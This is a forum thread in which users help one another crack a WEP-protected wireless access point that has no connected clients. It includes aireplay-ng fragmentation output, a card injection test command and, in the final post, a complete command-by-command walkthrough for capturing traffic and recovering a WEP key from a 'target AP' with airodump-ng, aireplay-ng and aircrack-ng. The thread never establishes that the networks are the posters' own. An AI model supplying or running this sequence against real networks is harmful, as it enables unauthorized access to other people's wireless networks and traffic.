Thread: Problems trying to crack WEP w/o clients

  1. #1
    Just burned his ISO
    Join Date
    Feb 2010
    Posts
    4

Problems trying to crack WEP w/o clients

    Hello, nice to meet you all. First of all, English is not my native language so excuse my mistakes.

Well, the problem is that I cannot make this part of the aircrack guide work: Step 4 - Use aireplay-ng chopchop or fragmentation attack to obtain PRGA

The previous steps work fine, as I can make a fake auth with the AP. The AP is a THOMSON TCW710, the AUTH is OPN and the key is WEP 64-bit. I wanted to make it easy for starting, but I cannot get the chopchop attack to show this:

    Saving chosen packet in replay_src-0203-180328.cap
    Data packet found!
    Sending fragmented packet
    Got RELAYED packet!!
    Thats our ARP packet!
    Trying to get 384 bytes of a keystream
    Got RELAYED packet!!
    Thats our ARP packet!
    Trying to get 1500 bytes of a keystream
    Got RELAYED packet!!
    Thats our ARP packet!
    Saving keystream in fragment-0203-180343.xor
    Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
As I have read, chopchop does not work on some APs, but I cannot get the fragmentation attack to work either.

    So am I doing something wrong, or do I have to keep trying until success?
    Thanks folks.

  2. #2
Snayler
    My life is this forum
    Join Date
    Jan 2010
    Posts
    1,418

Re: Problems trying to crack WEP w/o clients

You are switching the terms chopchop and fragmentation. What you have there is the successful output of a fragmentation attack. As for your problem, you can try and see if your card is capable of chopchop and frag attacks, but you will need another wireless card. IIRC, the command was "aireplay-ng -9 -i <second device> <device you intend to test>". If the syntax is wrong, "man aireplay-ng" and "aireplay-ng --help" should clarify what the right command is.

  3. #3
    Just burned his ISO
    Join Date
    Feb 2010
    Posts
    4

Re: Problems trying to crack WEP w/o clients

Thank you Snayler for the reply, I became aware of the mistake once I reread the guide.

Can I perform that test with another card on another laptop, or do I need to use a second card on the same laptop? And if this is not possible (as of today I don't have another card to attach to the computer), could I use a workaround to try to crack the WEP without the fragmentation or chopchop attack?

  4. #4
Snayler
    My life is this forum
    Join Date
    Jan 2010
    Posts
    1,418

Re: Problems trying to crack WEP w/o clients

Quote Originally Posted by elgato
    Can I perform that test with another card on other laptop or do I need to use a second card on the same laptop
Yes, gato, you can do it on another laptop. What matters in this test is the card, not the rest of the setup.

Quote Originally Posted by elgato
    could I use a workaround to try to crack the WEP without the fragmentation or chopchop attack?
    No, not that I've heard of.

Quote Originally Posted by elgato
    (as of today a don't have another card to attach to the computer)
    Are you using a USB card or internal wifi card?

Quote Originally Posted by elgato
    So am I doing something wrong, or do I have to keep trying until success?
    Now that I think of it, you have to make sure the packet you selected came from your AP, or else the attack will not work. Also, some packets, even from the same AP, will result in a failed attack. But if you have tried various times, then your problem should be something else.

  5. #5
    mcurran
    Guest

Re: Problems trying to crack WEP w/o clients

You don't need a client connected to the AP for WEP cracking, but sometimes a deauth helps launch the aireplay arpreplay attack (-3), unless I'm just imagining that...

    Here's the whole howto for WEP cracking, my preferred method at least:

    airmon-ng start <interface>

    (Notice the new interface created in monitor mode)

    airodump-ng <new interface>

    (Look for target network: Note the channel, BSSID, and maybe ESSID - PWR should be -82 or lower)

    airmon-ng stop <new interface>
    airmon-ng stop <interface>

    iwconfig <interface> channel <same channel as target AP>
    airmon-ng start <interface>
    iwconfig <new interface> channel <same channel as target AP>

    airodump-ng -c <channel> -w <any name file> --bssid <Target AP's BSSID> <new interface>

    [New Terminal]
    aireplay-ng -3 -b <Target AP's BSSID> -h <Your MAC ADDRESS> <new interface>
    [New Terminal]
    aireplay-ng -1 0 -a <Target AP's BSSID> -h <Your MAC ADDRESS> <new interface>

    (Watch the Data column in airodump-ng terminal and start aircrack in a new terminal once it's around 500)

    [New Terminal]
aircrack-ng -b <Target AP's BSSID> <same any name file>*.cap

Voilà!

    I also use macchanger sometimes, but it's not really any easier or more efficient, just use ifconfig in another terminal to look up your MAC. I don't want any credit for this tutorial, because I'm sure it's printed elsewhere a million times, and I probably learned it from another bt forum member in the past...
